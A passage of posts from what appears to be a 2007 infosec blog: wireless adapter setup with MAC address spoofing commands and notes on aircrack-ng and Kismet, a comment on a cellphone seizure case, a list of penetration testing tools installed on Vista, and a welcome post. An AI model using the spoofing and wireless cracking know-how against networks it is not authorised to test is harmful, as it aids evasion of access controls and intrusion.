You should then be able to issue the following commands to bring up the adapter and perform MAC address spoofing (optional):

igs-awilliams@igs-lap01# ifconfig wlan up
igs-awilliams@igs-lap01# ifconfig wlan0 hw ether 00:11:22:33:44:55

From here the sky is the limit. Kismet, the aircrack-ng suite, etc should function correctly as well as receiving accurate power levels from the driver. In addition to this connectivty to access points should be possible as well.

One observation that I made was that Backtrack tended to have a kernel panic if the adapter was plugged in at boot time. If you insert the adapter after boot and perform the necessary commands all should be well.

May Your Skill Prevail.

Warrantless cellphone seizure

2007-06-08T00:14:00.000-07:00

To quickly summarize the article below deals with what constitutes warrant less seizure of a cell phone when a suspect is apprehended by law enforcement.

http://articles.techrepublic.com.com/2100-1009_11-6187389.html?tag=nl.e118

After reading the article several times I felt compelled to at least comment on its relevancy insofar as laws regarding the seizure of information and the devices it is stored upon emerge and evolve.

Motion for exclusion of any evidence obtained from the cell phone in the above case in PDF format:

http://www.politechbot.com/docs/cell.phone.4a.brief.052907.pdf

This case has interesting ramifications as precedent is set. As the lines between cellphones, PDAs and laptops continue to blur will warrants have to be issued where granularity and specificity become commonplace as to what can be searched and what is off limits? If there is a shortcoming in the level of detail in the aforementioned warrant what valuable information inaccessible for building a case?

What are your thoughts?

Windows Vista InfoSec Build

2007-05-26T14:41:00.000-07:00

I recently installed Windows Vista Ultimate from scratch on one of my dual boot auditing laptops (Back|track 2 is on the second partition) and thought that I would share the experience for those considering the same endeavor.

I installed most popular infosec tools that I tend to use on a fairly regular basis when I'm on the Win32 platform (not very often). I have also included the status of other complimentary and supplementary software and drivers that I installed:

Amap, Autoruns and Autorunsc, BrutusA2, Burpsuite, Cain & Abel*, clamAV, Fgdump, Fport, Hydra, Ike-scan, Ipscan, John the Ripper, Metasploit Framework 3, Microsoft Baseline Security Analyzer 2.1, Nbtscan, Netcat, Nessj, NessusWX, Netstumbler, Ngrep, Ollydbg*, p0f, Paros Proxy, ProcessExplorer, PSTools Suite, Putty, Rainbowcrack, Snort, sguil-client 0.6.1, Spikeproxy, SuperScan4, Tcpview, Nessus 3.0.5 for win32, Wireshark*, Windump, Nmap 4.20, SQLRecon, SQLPing3, Suru, Winhex and Wikto

All of the applications installed fairly painlessly to my surprise.

* Notes that the application in question had to be given Administrator privileges to function correctly in my environment.

Mozilla Firefox 2.0.0.3 with Add-ons (mostly for web application security):

Auto Copy, Fasterfox, Firebug, FireGPG, Header Spy, JSView, Live HTTP Headers, Server Spy, ShowIP, SwitchProxy Tool,
Tamper Data, Torbutton, User Agent Switcher, View Source Chart, Web Developer

Print Drivers:

Epson Color Stylus 900N (Draft printer) Detected and installed driver automagically.

Lexmark Color Laser 530dn (Production printer) Manual driver and configuration required.

Hardware Devices:

Supplementary Hardware:

Logitech Quickcam for Notebooks Pro (Video conferencing) Detected and installed driver automagically.

Canon Powershot A560 (Incident and Physical Security photos) Detected and installed driver automagically.

Infosec Hardware:

Alfa Network AWUS03H 802.11b/g Detected and installed driver automagically.

Ubiquiti SRC PCMCIA 802.11a/b/g Detected and installed driver automagically.

Supplementary tools:

Winpcap 4.0, Stunnel, Sun Java JRE, Eclipse 3.2.2, Skype 3.2, Pidgin 2.0.1, OpenOffice 2.2, OpenVPN, Python 2.5.1, Ruby 1.8.6, Adobe Acrobat Reader 8, Adobe Flash Player 9, VMWare Player 2.0, WinPT, Truecrypt (when I'm not so angry I'll explain why not Bitlocker).

That's in in a nutshell. I'm sure that I'll add more in upcoming days and if its anything worthwhile I will be sure to share.

Until next time...May Your Skill Prevail.

Welcome!

2007-05-25T16:42:00.000-07:00

Welcome to the IRON::Guard Security blog! We plan on sharing various materials with you as time permits। From book reviews to opinions on the Information Security trade and useful information obtained from our various experiences will be available here from time to time। Thank you for stopping by and reading। We will have more content posted here in the upcoming days, weeks, months and years।